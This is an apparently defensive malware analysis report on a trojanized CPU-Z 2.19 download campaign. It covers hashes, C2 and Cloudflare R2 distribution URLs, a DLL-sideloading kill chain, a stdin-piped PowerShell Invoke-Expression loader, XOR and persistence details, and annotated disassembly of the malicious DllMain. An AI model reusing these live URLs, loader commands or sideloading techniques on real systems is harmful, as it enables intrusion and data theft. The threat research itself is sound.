CPU-Z 2.19 Supply Chain Attack - Malware Analysis Report

Date: 2026-04-10 Analyst: nemesis Classification: Trojan / Backdoor (Alien RAT variant) Severity: CRITICAL Campaign ID: CityOfSin (extracted from C2 callback UTM parameters) Scope: CPUID official domain compromise affecting CPU-Z, HWMonitor, HWMonitor Pro, PerfMonitor 2, powerMAX + separately FileZilla Status: Breach confirmed and fixed by CPUID; site was compromised ~6 hours on April 9-10, 2026 CPUID Statement: "A secondary feature (a side API) was compromised for approximately six hours [...] causing the main website to randomly display malicious links. Our signed original files were not compromised." Threat Actor Handle: @d_coroner (found in VBS payload headers on live backend) LIVE INFRASTRUCTURE (as of 2026-04-10): Backend 147.45.178.61 still serving VBS payloads; R2 bucket still serving trojanized cpu-z_2.19-en.zip; staging server qwen1.pages.dev still delivering shellcode

1. Executive Summary
2. Sample Inventory
3. Attack Overview
4. Technical Analysis
5. Command & Control Infrastructure
6. Indicators of Compromise (IOCs)
7. Sandbox Analysis Summary
8. AV Detection Summary
9. Detection & Hunting Guidance
10. Remediation Steps
11. References & VirusTotal Links
Appendix A: Extracted Backdoor Components
Appendix B: Live Infrastructure & Earlier Campaign Analysis

1. Executive Summary

On April 9-10, 2026, a large-scale supply chain compromise of the CPUID official website (cpuid.com) was identified, affecting downloads of multiple popular hardware tools. The malware package (cpu-z_2.19-en.zip) bundles legitimate CPU-Z executables alongside a malicious CRYPTBASE.dll that exploits the Windows DLL search order to achieve code execution via DLL sideloading (T1574.002).

Upon execution of the legitimate CPU-Z binary, the malicious DLL is loaded instead of the system CRYPTBASE.dll via transitive DLL search order hijacking (loaded by ADVAPI32.dll, not directly by CPU-Z). This triggers a multi-stage infection chain:

Zig-compiled proxy DLL decodes 349KB of colon-hex encoded shellcode from its .rdata section
Reflective PE loading of an encrypted out.dll payload via position-independent shellcode
DNS-over-HTTPS resolution via Cloudflare (1.1.1.1) to evade DNS monitoring
C2 callback to welcome.supp0v3.com -- the C2 delivers the actual backdoor (confirmed by sandbox execution ordering: C2 POST occurs before any file drops)
PowerShell-based loader executing C2-delivered code via stdin piping
In-memory C# compilation using csc.exe, producing shellcode loaders
Quad-persistence via MSBuild .proj files, scheduled tasks, COM TypeLib hijacking (with IPv6-encoded .NET deserialization chain), and PowerShell profile autorun

The threat is classified as Backdoor.Win64.Alien by Kaspersky and detected as a trojan by 22/77 AV engines for the ZIP package and 31/76 for the DLL component. The embedded C2 config contains {"tag":"tbs","referrer":"cpz","callback":"..."} and the callback includes the campaign tag CityOfSin, suggesting organized campaign tracking by the threat actor.

2. Sample Inventory

2.1 Primary Package (ZIP)

Property	Value
Filename	`cpu-z_2.19-en.zip`
SHA256	`eff5ece65fb30b21a3ebc1ceb738556b774b452d13e119d5a2bfb489459b4a46`
SHA1	`b3dda9b61f0d7dfadbd23a206cb5d4f06d4eb96b`
MD5	`fed973c1f9ef2461a45e956fbbdf8ea9`
Size	6,050,530 bytes (5.77 MB)
Uncompressed	15,537,164 bytes (14.8 MB)
Type	ZIP archive
First Seen (VT)	2026-04-09
VT Detection	22/77 malicious
Threat Label	`trojan.tedy/alien`
VT Link	View on VirusTotal

2.2 Bundled Files

The ZIP contains a folder cpu-z_2.19-en (1)/ with the following files:

File	SHA256	Size	Description
CRYPTBASE.dll	`49685018878b9a65ced16730a1842281175476ee5c475f608cadf1cdcc2d9524`	2,179,584 B	MALICIOUS - DLL sideload payload
cpuz_x32.exe	`d4b7556f00a6d5ea5a47a5aefe267681334167db8c83ba94806da3dfd9fdca79`	5,903,080 B	Legitimate CPU-Z 32-bit (launcher)
cpuz_x64.exe	`8e0077a742183fbcbb4f6cf2fe945ea2ced13a058ccf79f5b81157ededc47e16`	7,411,432 B	Legitimate CPU-Z 64-bit (target host)
cpuz.ini	`b7b3560e286ba5f39c019e99face5cfa68cca42cf29bbe2e0f0d1e9626de5c8f`	610 B	Configuration file
cpuz_readme.txt	`7eb3223b9759e6553fdb23f93b384f451af342982a21343735d4349827e5d1a5`	42,458 B	Readme (legitimacy decoy)

2.3 Related DLL Variant

A second variant of the malicious CRYPTBASE.dll was also identified:

Property	Value
SHA256	`9cdabd70f50dc8c03f0dfb31894d9d5265134a2cf07656ce8ad540c1790fc984`
SHA1	`7cee7db67985413f22d9424a371336647a987a97`
MD5	`9012602d41cde23297a73c074a413ff6`
Size	1,256,960 bytes (1.19 MB)
Imphash	`7f3aa71d29bb7534f516d6ca6723ccf4`
VT Detection	31/76 malicious
VT Link	View on VirusTotal

Key difference: The variant is smaller (1.19 MB vs 2.13 MB) and has a different imphash, suggesting a different compilation or build of the same payload family.

2.4 C2-Delivered Dropped Files

These files are not present in the ZIP -- they are delivered by the C2 server after the initial callback and dropped to disk by the PowerShell stage. This was confirmed by sandbox execution ordering (C2 POST occurs before file writes).

File	SHA256	Size	Type	Purpose
CommonBuild.proj	`1f7fa30eefeedfdcaaf0eca7d20d866fd48e5d3e75dbe7e47976bac3c097b271`	3,984 B	MSBuild XML + C#	Persistence shellcode loader (XOR decrypt + NtAllocateVirtualMemory)
c_3791.proj	Same hash (identical file)	3,984 B	MSBuild XML + C#	Same payload, alternate path
ActiveX.sct	`0d8d759db6c2012210a07ca825b01f727a3a23d615b8dbb4c241b508b2011448`	977 B	COM Scriptlet (JScript)	COM TypeLib hijack -> launches Clippy.sct via regsvr32
Clippy.sct	`02ff4cf4bea26993e4556706bada73fce98284388c57bad31ceb784c4791a703`	11,879 B	COM Scriptlet (JScript)	IPv6-encoded .NET assembly (Moniker.dll) deserialization runner
Moniker.dll	`3d805bd27ceb641615b755d26092b13c135e1f3eb9f9758cd9df4bd08ace3d2d`	4,185 B	.NET Assembly (i386 IL)	Shellcode runner: reads file, VirtualAlloc RWX, CreateThread
BuildCache.dat	(varies per victim)	--	XOR-encrypted shellcode	Shellcode payload read by CommonBuild.proj (XOR key: `1+(i%17)`)
data.dat	(varies per victim)	--	Raw shellcode	Shellcode payload read by Moniker.dll via CachePath env var

3. Attack Overview

3.1 Attack Vector & Supply Chain Method

This is NOT a compromise of CPUID's build infrastructure. The bundled executables are genuinely signed by CPUID and Microsoft:

Binary	Signer	Certificate	Signed Date	VT Detection
cpuz_x32.exe	CPUID + Microsoft Windows HCP	Sectigo EV Code Signing	2026-03-16 10:44 AM	0/77 (clean)
cpuz_x64.exe	CPUID + Microsoft Windows HCP	Sectigo EV Code Signing	2026-03-16 10:45 AM	0/77 (clean)

The attack is a software repackaging attack: the threat actor downloads official CPUID releases, adds a malicious CRYPTBASE.dll, and repackages as ZIP for distribution. Distribution vectors likely include:

Malvertising via Google Ads (consistent with the 2023 CPU-Z malvertising campaign)
SEO poisoning with fake download sites
Fake software portals (file names like cpu-z_2.19-en.zip, cpu-z.zip, cpu-z_2.19.zip suggest multiple distribution channels)

Evidence of repackaging: One VT submission path was cpu-z_2.19-en + CRYPT/cpuz_x32.exe -- the attacker's working directory name + CRYPT leaked, showing the DLL was manually added.

3.1.1 Multi-Product Campaign (Confirmed)

This is not limited to CPU-Z. The same threat actor is trojanizing multiple CPUID products using identical infrastructure:

Package	SHA256 (prefix)	Size	CRYPTBASE.dll Hash	C2 Domain	Confirmed
`cpu-z_2.19-en.zip`	`eff5ece6...`	6.0 MB	`49685018...`	`welcome.supp0v3.com`	VT sandbox
`cpu-z_2.19-en.zip` (variant)	`9932fa8d...`	6.0 MB	(bundled)	`welcome.supp0v3.com`	VT sandbox
`cpu-z.zip` / `cpu-z_2.19.zip`	`cfbd87ba...`	5.9 MB	(bundled)	`welcome.supp0v3.com`	VT contacted_domains
`cpu-z_2.19-en.zip` (variant)	`f8b09fa8...`	5.9 MB	(bundled)	`welcome.supp0v3.com`	VT sandbox
powermax_1.00/ (with PDF lure)	`d3bb52e5...`	11.9 MB	`b63aa4a7...` (same size, diff hash)	`welcome.supp0v3.com`	VT contacted_domains

The powerMAX package includes a legitimate PDF documentation lure (powerMAX.pdf, 378KB, 0/77 detection) alongside the trojanized binaries, adding credibility.

3.1.2 Threat Actor Infrastructure Timeline

The supp0v3.com domain and associated infrastructure reveal a development timeline:

Date	Event	Evidence
2025-09-19	.url exploit targeting LibreOffice (`file://147.45.178.61@80/.../LibreOffice_25.8.4_Win_x86-64.vbs`)	VT first_submission_date; CVE-2023-36025 SmartScreen bypass
2025-10-29	Domain `supp0v3.com` registered	WHOIS creation_date
2025-10-29	`ai.supp0v3.com` goes live -> 147.45.178.61 (bare IP, NOT behind Cloudflare)	VT DNS; development/staging server
2025-11-17	`helloworld.supp0v3.com` created (behind Cloudflare)	VT first seen; testing Cloudflare fronting
2025-11-27	Apache server on 147.45.178.61 last modified	Shodan Last-Modified header
2025-12-07	.url exploit targeting Google Drive (`file://147.45.178.61@80/.../GoogleDriveSetup.vbs`)	VT first_submission_date
2025-12-11	`welcome.supp0v3.com` activated (production C2, behind Cloudflare)	VT first seen
2025-12-13	First CRYPTBASE.dll variant appears (trojan.reflo, 2.2MB)	VT first_submission_date for `8a6c39f9...`
2026-03-16	CPU-Z v2.19 officially signed by CPUID	Authenticode signing date
2026-04-08	powerMAX trojanized ZIP created (with PDF lure)	ZIP bundle highest_datetime
2026-04-09	CPU-Z trojanized ZIPs appear in the wild	VT first_submission_date for `eff5ece6...`

3.1.3 Backend Server (147.45.178.61)

The ai.supp0v3.com subdomain exposes the real backend server -- NOT behind Cloudflare:

Property	Value
IP	`147.45.178.61`
PTR	`135119.ip-ptr.tech`
ASN	AS215540 (Global Connectivity Solutions LLP)
Location	Frankfurt am Main, Germany
Org Address	Suite 310, 21 Hill Street, Haverfordwest, Pembrokeshire, UK
Open Ports	22 (OpenSSH 9.6p1 Ubuntu), 80 (Apache httpd)
TLS Certificate	*Subject: `.vk.com`, O=V Kontakte LLC, L=Saint Petersburg, C=RU**
VT Detection	8/94 malicious

The server uses a stolen or self-signed VK.com (VKontakte) wildcard certificate with Russian locality data (Saint Petersburg). This, combined with the bulletproof hosting choice (Global Connectivity Solutions -- a provider frequently used for malicious hosting), strongly suggests a Russian-nexus threat actor.

The same IP was used for earlier .url shortcut exploits (CVE-2023-36025 SmartScreen bypass) targeting LibreOffice and Google Drive downloads, sharing VBS payloads via WebDAV (file://147.45.178.61@80/file/...). This connects the current DLL sideloading campaign to an earlier Windows shortcut exploit campaign by the same actor.

3.1.4 Three CRYPTBASE.dll Variants

Variant	SHA256 (prefix)	Size	Imphash	First Seen	Notes
v1 (early)	`8a6c39f9...`	2,217,472	`4ace1d82...`	2025-12-13	Labeled `trojan.reflo`; also seen as `fi8i1i.exe`
v2 (smaller)	`9cdabd70...`	1,256,960	`7f3aa71d...`	2025-12-31	No TLS/buildid; has `MessageBoxA` import
v3 (bundled)	`49685018...`	2,179,584	`76ef47c1...`	2026-04-09	TLS support, SRW locks; production build
v3b (powerMAX)	`b63aa4a7...`	2,179,584	(same family)	2026-04-08	Same size as v3, different hash; powerMAX campaign

3.1.5 Wider Campaign: FileZilla, PerfMonitor, and CPUID Domain Compromise

VT intelligence and OSINT reveal this is part of a larger supply chain operation affecting multiple software products:

FileZilla (confirmed same C2):

Property	Value
DLL	`version.dll` (DLL sideloading, not CRYPTBASE.dll)
SHA256	`e4c6f8ee8c946c6bd7873274e6ed9e41dec97e05890fa99c73f4309b60fd3da4`
Size	361,984 bytes
Detection	50/76
First seen	2025-12-31
Threat label	`trojan.tedy/r002c0dcl26`
Contacted IPs	`104.21.63.112`, `172.67.145.101` (same as `welcome.supp0v3.com`), `1.1.1.1` (DoH)
Tags	`spreader`, `checks-bios`, `detect-debug-environment`, `calls-wmi`

The FileZilla variant uses version.dll instead of CRYPTBASE.dll for sideloading but contacts the same C2 IPs (104.21.63.112, 172.67.145.101) and uses the same DoH technique (1.1.1.1). The trojan.tedy classification matches the CPU-Z samples.

PerfMonitor 2 (confirmed same pattern):

Property	Value
Package	`perfmonitor-2_2.04.zip`
SHA256	`e0541fb863142ed515f2e76a2f93babc3b9cf3af1b6d12be57f16a665b4f6406`
Size	1,396,662 bytes
Detection	14/77
Bundle	6 children: 2 EXE + 1 DLL + 1 PDF + 1 INI (same pattern as CPU-Z and powerMAX)

CPUID Official Domain Compromise (OSINT):

Per vx-underground and igor'sLAB, the official cpuid.com domain was compromised and serving trojanized downloads directly. The malware was described as:

Deeply trojanized, distributing from the compromised official domain
Multi-staged, operating almost entirely in-memory
Using "interesting methods to evade EDRs and AVs such as proxying NTDLL functionality from a .NET assembly"
The same threat group that was masquerading FileZilla in early March 2026

This confirms the attack is a true supply chain compromise -- not just software repackaging -- with the official CPUID download infrastructure serving malicious binaries.

The compromise was discovered when Reddit users noticed HWMonitor 1.63 downloads from cpuid.com were redirected to a file named HWiNFO_Monitor_Setup.exe with a Russian-language installer (modified Inno Setup). Download links on cpuid.com were redirected to Cloudflare R2 object storage rather than CPUID's standard infrastructure.

Official CPUID Statement (from Doc TB / Sam, CPUID developer, via X/Twitter):

"Investigations are still ongoing, but it appears that a secondary feature (basically a side API) was compromised for approximately six hours between April 9 and April 10, causing the main website to randomly display malicious links (our signed original files were not compromised). The breach was found and has since been fixed."

Key takeaways from CPUID's statement:

Attack vector: A "side API" on the CPUID website was compromised -- not the build pipeline or file hosting
Duration: ~6 hours between April 9-10, 2026
Mechanism: The compromised API caused download links to randomly redirect to malicious URLs (Cloudflare R2 buckets)
Signed files safe: CPUID's original signed binaries were NOT compromised -- the attacker served their own trojanized packages via redirect
Status: Breach found and fixed

Cloudflare R2 Redirect URLs (discovered via VT intelligence):

https://pub-f3252d8370f34f0d9f3b3c427d3ac33c.r2.dev/hwmonitor_1.63.zip
https://pub-fd67c956bf8548b7b2cc23bb3774ff0c.r2.dev/hwmonitor_1.63.zip
https://pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev/hwmonitor/HWiNFO_Monitor_Setup.exe

Three separate Cloudflare R2 bucket IDs were used, suggesting the attacker rotated storage to avoid takedowns:

pub-f3252d8370f34f0d9f3b3c427d3ac33c
pub-fd67c956bf8548b7b2cc23bb3774ff0c
pub-45c2577dbd174292a02137c18e7b1b5a

HWiNFO_Monitor_Setup.exe (the redirected installer):

Property	Value
SHA256	`eefc0f986dd3ea376a4a54f80ce0dc3e6491165aefdd7d5d6005da3892ce248f`
Size	4,233,610 bytes
Detection	33/77 (Kaspersky: `Backdoor.Win64.Alien.de`, CrowdStrike: `win/malicious_confidence_100%`)
Type	Modified Inno Setup installer with Russian-language dialogs
First seen	2026-04-09
Threat	`trojan.tedy/filerepmalware`

Two distribution methods were used:

ZIP repackaging -- official ZIPs re-bundled with malicious CRYPTBASE.dll added
Inno Setup installer -- completely custom installer (HWiNFO_Monitor_Setup.exe) served via R2 redirect, with embedded payload and Russian UI

Full confirmed scope of compromised CPUID products (all using identical 2,179,584-byte CRYPTBASE.dll variants, confirmed via VT intelligence):

Product	CRYPTBASE.dll SHA256 (prefix)	VT Path	Detection
CPU-Z 2.19	`49685018...`	`cpu-z_2.19-en (1)/CRYPTBASE.dll`	31/77
CPU-Z 2.19 (variant build)	`0d5578b2...`	`cpu-z_2.19-en + CRYPT/CRYPTBASE.dll`	24/77
HWMonitor 1.63	`aec12d65...`	`hwmonitor_1.63/CRYPTBASE.dll`	29/77
HWMonitor 1.63 (variant build)	`a6afdcc6...`	`hwmonitor_1.63/CRYPTBASE.dll`	23/77
HWMonitor Pro 1.57	`98e0f9c8...`	`hwmonitor-pro_1.57/CRYPTBASE.dll`	20/77
PerfMonitor 2 v2.04	`cd7385e7...`	`perfmonitor-2_2.04/CRYPTBASE.dll`	25/77
powerMAX 1.00	`b63aa4a7...`	`powermax_1.00/CRYPTBASE.dll`	(bundled in ZIP)

FileZilla (same C2, different DLL name):

Product	DLL	SHA256 (prefix)	Detection	Evidence
FileZilla 3.69.5	`version.dll`	`e4c6f8ee...`	50/76	Contacts same IPs: 104.21.63.112, 172.67.145.101, 1.1.1.1

MEXC Crypto Exchange (same C2 string embedded):

Product	DLL	SHA256	Size	Detection	First Seen
MEXC exchange app	`CRYPTBASE.dll`	`74b5d631cc6802a5790f99a4bfefd9b3dfcfb43007f9fc576f7dfd4eac69d52e`	34,304 B	20/76	2025-11-27

The MEXC variant is remarkably small (34KB vs 2.2MB for CPUID), suggesting a minimal loader build. This extends the campaign beyond software utilities into cryptocurrency/fintech.

Additional version.dll variant (unknown host application):

DLL	SHA256	Size	Detection	First Seen	Threat
`version.dll`	`c3f74b948b902cc641da83fe6535133894ed979a73068e4937c633c9a661e3ce`	1,242,624 B	41/76	2025-12-31	`trojan.dllhijack/r002c0dco26`

VBA macro component (possible phishing delivery):

File	SHA256	Size	Detection	First Seen	Threat
VBA document	`1c76af3a9097f50384345237140df78e8b456e4165b0270fdc3a1414413dc64e`	14,776 B	8/76	2025-12-17	`trojan.networm/sagent`

This VBA file contains the supp0v3.com C2 string, suggesting the threat actor also uses email/document phishing as an initial access vector alongside the supply chain compromise.

Complete R2 distribution directory (reconstructed from VT URL intelligence):

pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev/       ← MAIN BUCKET (all products)
├── cpu-z_2.19-en.zip
├── hwmonitor_1.63.zip
├── hwmonitor/
│   └── HWiNFO_Monitor_Setup.exe                   ← Inno Setup with Russian UI
├── hwmonitor-pro/
│   ├── hwmonitor-pro_1.57.zip
│   └── HWMonitorPro_1.57_Setup.exe
├── perfmonitor/
│   ├── perfmonitor-2_2.04.zip
│   └── PerfMonitor2_Setup.exe
└── powermax/
    ├── powermax_1.00.zip
    └── powermax.exe

pub-fd67c956bf8548b7b2cc23bb3774ff0c.r2.dev/       ← SECONDARY BUCKET
├── cpu-z_2.19-en.zip
└── hwmonitor_1.63.zip

pub-f3252d8370f34f0d9f3b3c427d3ac33c.r2.dev/       ← TERTIARY BUCKET
├── cpu-z.zip
└── hwmonitor_1.63.zip

Complete DLL variant inventory (all containing supp0v3.com C2 string):

Variant	DLL Name	Size	Proxy Exports	Target	First Seen
MEXC minimal	CRYPTBASE.dll	34 KB	SystemFunction001-004	Crypto exchange	2025-11-27
FileZilla	version.dll	362 KB	GetFileVersionInfoA etc.	File transfer	2025-12-31
Unknown app	version.dll	1.2 MB	GetFileVersionInfoA etc.	Unknown	2025-12-31
CPUID early	CRYPTBASE.dll	2.2 MB	SystemFunction001-041	CPUID products	2025-12-13
CPUID production	CRYPTBASE.dll	2.1 MB	SystemFunction001-041	CPUID products	2026-04-09

The threat actor maintains multiple builds of their DLL proxy at different sizes, adapting the payload to the target application. All variants share the core architecture: proxy DLL exports + embedded C2 config + colon-hex encoded shellcode in .rdata.

3.2 Kill Chain

[User downloads trojanized CPU-Z ZIP]
         |
         v
[Extracts ZIP -> cpu-z_2.19-en (1)/]
         |
         v
[Runs cpuz_x32.exe -> launches cpuz_x64.exe]
         |
         v
[cpuz_x64.exe loads CRYPTBASE.dll from local directory]
[DLL SIDELOADING - T1574.002 (transitive via ADVAPI32.dll)]
         |
         v
[CRYPTBASE.dll: suspends main thread, decodes 349KB shellcode from .rdata]
[Reflective-loads encrypted out.dll via shellcode stub]
         |
         v
[out.dll resolves C2 via DNS-over-HTTPS (1.1.1.1)]
[GET https://1.1.1.1/dns-query?name=welcome.supp0v3.com&type=A]
         |
         v
[C2 callback - RECEIVES next-stage payload]
[POST https://welcome.supp0v3.com/d/callback -> 200 OK (55 bytes JSON)]
[?utm_tag=snip&utm_source=CityOfSin]
         |
         v
[PowerShell spawned via stdin pipe with C2-delivered code]
[powershell.exe -Command "[Console]::In.ReadToEnd() | Invoke-Expression"]
         |
         v
[PowerShell compiles C# via csc.exe, drops persistence files]
[.cs source -> .dll -> BuildCache.dat -> c_3791.proj -> CommonBuild.proj]
         |
         v
[Establishes persistence x4]:
  1. Registry Run key (MSBuild .proj loader)
  2. Scheduled Task (hidden PowerShell every 68 min)
  3. COM Hijacking (TypeLib -> ActiveX.sct -> Clippy.sct -> Moniker.dll)
  4. PowerShell profile autorun (autorun.ps1)
         |
         v
[Launches Chrome from PowerShell (purpose under investigation)]

3.3 Verified Execution Sequence (Sandbox-Proven)

The following execution order was verified from CAPE sandbox process creation and HTTP event ordering. The critical finding is that the C2 callback occurs before any file drops or persistence -- confirming the backdoor components are C2-delivered, not statically embedded.

#	Event	Evidence
1	`cpuz_x32.exe` starts	Process created [0]
2	`cpuz_x32.exe` launches `cpuz_x64.exe`	Process created [1]
3	`cpuz_x64.exe` transitively loads `CRYPTBASE.dll` (via ADVAPI32 DLL search order)	DLL sideloading observed
4	CRYPTBASE.dll decodes .rdata payload, reflective-loads `out.dll`	Shellcode execution in DLL thread
5	`out.dll` resolves C2 via DoH	HTTP [2]: `GET https://1.1.1.1/dns-query?name=welcome.supp0v3.com&type=A` -> 200
6	`out.dll` contacts C2 server	HTTP [3]: `POST https://welcome.supp0v3.com/d/callback` -> 200 (55 bytes JSON)
7	C2 delivers backdoor payload	C2 response received before any file writes
8	PowerShell spawned with C2-delivered code via stdin	Process created [4]: `powershell.exe -Command "[Console]::In.ReadToEnd() \| Invoke-Expression"`
9	C# source code compiled	Process [5]: `csc.exe /noconfig /fullpaths @"...\ktc155gm.cmdline"` -> writes `.cs`, `.dll`
10	Persistence files dropped	Files [29-31]: `BuildCache.dat`, `c_3791.proj`, `CommonBuild.proj`
11	Registry persistence set	Registry [1]: Run key; Registry [2-3]: COM TypeLib hijack
12	Chrome launched with extension	Process [7]: `chrome.exe`

Key insight: Steps 5-6 (C2 callback) occur before steps 8-11 (code compilation + persistence). The DLL itself only contains the dropper/loader -- the actual backdoor code (C# source, .proj files, .sct scriptlets) is fetched from the C2 at runtime.

3.4 MITRE ATT&CK Mapping

Tactic	Technique	ID	Detail
Initial Access	Supply Chain Compromise	T1195.002	Trojanized CPU-Z ZIP distribution
Execution	Command and Scripting Interpreter: PowerShell	T1059.001	stdin-piped PowerShell execution
Execution	Command and Scripting Interpreter: JavaScript	T1059.007	ActiveX.sct and Clippy.sct JScript execution
Execution	Inter-Process Communication	T1559	PowerShell stdin piping to avoid cmdline logging
Execution	Signed Binary Proxy Execution: MSBuild	T1127.001	MSBuild .proj file with inline C# tasks
Execution	Signed Binary Proxy Execution: Regsvr32	T1218.010	ActiveX.sct -> regsvr32 /i:Clippy.sct scrobj.dll
Execution	Reflective Code Loading	T1620	out.dll reflective PE loading via shellcode stub
Execution	.NET Deserialization	T1059	BinaryFormatter deserialization of Moniker.dll via IPv6 encoding
Persistence	Boot or Logon Autostart Execution: Registry Run Keys	T1547.001	HKCU...\Run<random-guid> -> MSBuild .proj
Persistence	Scheduled Task/Job	T1053.005	Hidden scheduled task every 68 min for 20 years
Persistence	Event Triggered Execution: Component Object Model Hijacking	T1546.015	TypeLib GUID {EAB22AC0-...} -> ActiveX.sct -> Clippy.sct -> Moniker.dll
Persistence	Boot or Logon Autostart Execution: PowerShell Profile	T1546.013	autorun.ps1 in PowerShell directory
Defense Evasion	Hijack Execution Flow: DLL Side-Loading	T1574.002	Transitive sideload via ADVAPI32 -> CRYPTBASE.dll
Defense Evasion	Obfuscated Files or Information	T1027	Colon-hex encoding in .rdata; XOR `1+(i%17)` for BuildCache.dat; IPv6-encoded .NET assembly
Defense Evasion	Deobfuscate/Decode Files or Information	T1140	Runtime decoding of shellcode from .rdata; XOR decryption of BuildCache.dat
Defense Evasion	Indicator Removal: File Deletion	T1070.004	Self-delete behavior
Defense Evasion	Virtualization/Sandbox Evasion	T1497	Debug environment detection, BIOS checks, long sleeps (Zenbox marked CLEAN)
Defense Evasion	Process Injection	T1055	NtAllocateVirtualMemory + shellcode execution via delegate invoke
Defense Evasion	Masquerading	T1036	.proj disguised as "Microsoft.Build.PackageOptimizer"; business-themed PS variable names
Defense Evasion	Ingress Tool Transfer	T1105	Backdoor components delivered from C2, not present in initial dropper
Defense Evasion	Abuse Elevation Control: Bypass UAC	T1548.002	`consent.exe` invoked (Dr.Web sandbox)
Discovery	System Information Discovery	T1082	Computer name, username, memory, BIOS checks
Execution	User Execution	T1204	Launches Chrome from PowerShell (purpose under investigation)
Command and Control	Application Layer Protocol: DNS	T1071.004	DNS-over-HTTPS via Cloudflare (1.1.1.1)
Command and Control	Encrypted Channel: Asymmetric Cryptography	T1573.002	HTTPS C2 communication
Command and Control	Proxy: External Proxy	T1090.002	Cloudflare CDN as reverse proxy; Caddy backend
Command and Control	Web Service: Bidirectional Communication	T1102.002	Cloudflare R2 object storage for payload distribution

4. Technical Analysis

4.1 Stage 0 - Delivery (Trojanized ZIP)

The package cpu-z_2.19-en.zip is a ZIP archive created on 2026-04-09 12:42:10 UTC. It contains a folder cpu-z_2.19-en (1)/ with 5 files: two legitimate CPU-Z executables (x32 and x64), a configuration file, a readme, and the malicious CRYPTBASE.dll.

The legitimate CPU-Z binaries serve as the "host" application that will unknowingly load the malicious DLL. The readme and ini files add to the appearance of a legitimate software package.

4.2 Stage 1 - DLL Sideloading (CRYPTBASE.dll)

Technique: T1574.002 - DLL Side-Loading

CRYPTBASE.dll is a Windows system DLL normally located in C:\Windows\System32\. The legitimate cpuz_x64.exe imports functions from this DLL. When placed in the same directory as the executable, Windows loads it from the local directory first (DLL search order hijacking).

Malicious CRYPTBASE.dll (bundled) analysis:

Property	Value
Architecture	PE32+ (x86-64) DLL
Imphash	`76ef47c106370a232be021dc2e46cdf7`
Entry Point	`0x1000`
Sections	`.text`, `.rdata`, `.buildid`, `.data`, `.pdata`, `.tls`, `.reloc`
`.rdata` size	2,041,856 bytes (contains embedded payload data)
Threat Label	`trojan.tedy/alien`

Exported functions (proxy exports): The DLL exports the same functions as the legitimate CRYPTBASE.dll to maintain compatibility:

DllMain
SystemFunction001 through SystemFunction005
SystemFunction028, SystemFunction029
SystemFunction034, SystemFunction036
SystemFunction040, SystemFunction041

These proxy exports likely forward calls to the real CRYPTBASE.dll while executing malicious code in DllMain or a CreateThread call.

Key imports (malicious DLL variant):

KERNEL32.dll: CreateThread, VirtualAlloc, GetProcAddress, LoadLibraryExA,
              ReadFile, WriteFile, SuspendThread, OpenThread, FreeLibrary
USER32.dll:   MessageBoxA
ntdll.dll:    NtAllocateVirtualMemory, NtFreeVirtualMemory

The use of NtAllocateVirtualMemory (direct syscall-adjacent) and CreateThread strongly suggests shellcode injection or in-memory payload execution.

4.3 Deep Dive: CRYPTBASE.dll Internals

4.3.1 PE Structure

The malicious CRYPTBASE.dll is a Zig-compiled x86-64 DLL, confirmed by:

.buildid section with Zig-style build ID (abd683ca)
thread panic: error string (Zig stdlib panic handler format)
aborting due to recursive panic (Zig runtime)
Unable to dump stack trace: debug info stripped (Zig stripped binary)

Bundled CRYPTBASE.dll PE Layout:

Section      VirtAddr   VirtSize    RawSize  Entropy  Flags
.text         0x1000      11,494     11,776    6.52    XR    (code - 11KB)
.rdata        0x4000   2,041,804  2,041,856    4.24    R     (PAYLOAD - 1.95MB)
.buildid    0x1f7000         28        512    0.10    R     (Zig build ID)
.data       0x1f8000      4,500        512    0.65    RW    (globals)
.pdata      0x1fa000        588      1,024    2.86    R     (exception info)
.tls        0x1fb000         24        512    0.00    RW    (thread-local)
.reloc      0x1fc000    121,952    122,368    4.97    R     (relocations)

Critical observation: The .rdata section is 1.95 MB (94% of the DLL) — this is where the encoded shellcode payload is stored. The actual code in .text is only 11 KB.

Security features: ASLR (Dynamic Base) + DEP/NX + High Entropy ASLR enabled. No CFG.

Internal DLL name: proxy.dll (found in export directory metadata)

4.3.2 DllMain Execution Flow

The DLL's entry point at RVA 0x1000 (_DllMainCRTStartup) immediately calls DllMain at RVA 0x1018. The full execution flow:

_DllMainCRTStartup (0x1000):
    call DllMain
    mov eax, 1          ; Always return TRUE
    ret

DllMain (0x1018):
    test edx, edx       ; Check fdwReason
    je  PROCESS_DETACH  ; edx=0 -> DLL_PROCESS_DETACH
    cmp edx, 1          ; edx=1 -> DLL_PROCESS_ATTACH
    jne EXIT

  DLL_PROCESS_ATTACH:
    ; 1. Save hModule handle to global
    mov [rip+0x1f80e8], rcx

    ; 2. GetCurrentThreadId() -> save for later thread suspension
    call GetCurrentThreadId
    mov [rip+0x1f80f8], eax

    ; 3. CreateThread -> Thread1 (thread function at 0x10c1)
    ;    This is the orchestrator thread
    lea  r8, [rip+0x72]     ; lpStartAddress = 0x10c1
    xor  ecx, ecx           ; lpThreadAttributes = NULL
    xor  edx, edx           ; dwStackSize = 0
    xor  r9d, r9d           ; dwCreationFlags = 0
    call CreateThread

    ; 4. Load the REAL CRYPTBASE.dll for function forwarding
    call LoadRealDll

    ; 5. Return TRUE (DLL loaded successfully)
    push 1
    pop  rax
    ret

Thread1 - Orchestrator (0x10c1):

Thread1:
    ; 1. Open the MAIN THREAD of CPU-Z with THREAD_SUSPEND_RESUME access
    mov  ecx, 2              ; dwDesiredAccess = THREAD_SUSPEND_RESUME
    mov  r8d, [saved_tid]    ; dwThreadId = main thread ID
    call OpenThread

    ; 2. SUSPEND the main thread (freeze CPU-Z while we work)
    call SuspendThread(main_thread_handle)

    ; 3. Create Thread2 - the actual payload executor
    lea  r8, [0x18000112d]   ; Thread2 function address
    call CreateThread

    ; 4. Wait for Thread2 to complete setup
    call WaitForThread

    ; 5. RESUME the main thread (CPU-Z continues normally)
    call ResumeThread(main_thread_handle)

    ret

Thread2 - Payload Executor (0x112d):

Thread2:
    sub  rsp, 0x998          ; Large 2,456-byte stack frame
    ; Save XMM6-XMM11 (SIMD registers for decoding)

    ; 1. Copy 0xA0 bytes of config from .rdata (RVA 0xee940)
    lea  rsi, [rip+0xed7bd]  ; Source: config area in .rdata
    lea  rdi, [rbp+0x7b8]    ; Destination: stack buffer
    mov  ecx, 0xa0            ; 160 bytes
    rep movsb

    ; 2. Decode the colon-separated hex payload from .rdata
    ;    (uses XMM registers for SIMD-accelerated hex decoding)

    ; 3. Execute decoded shellcode -> reflective PE loading

    ret

Summary of DllMain thread choreography:

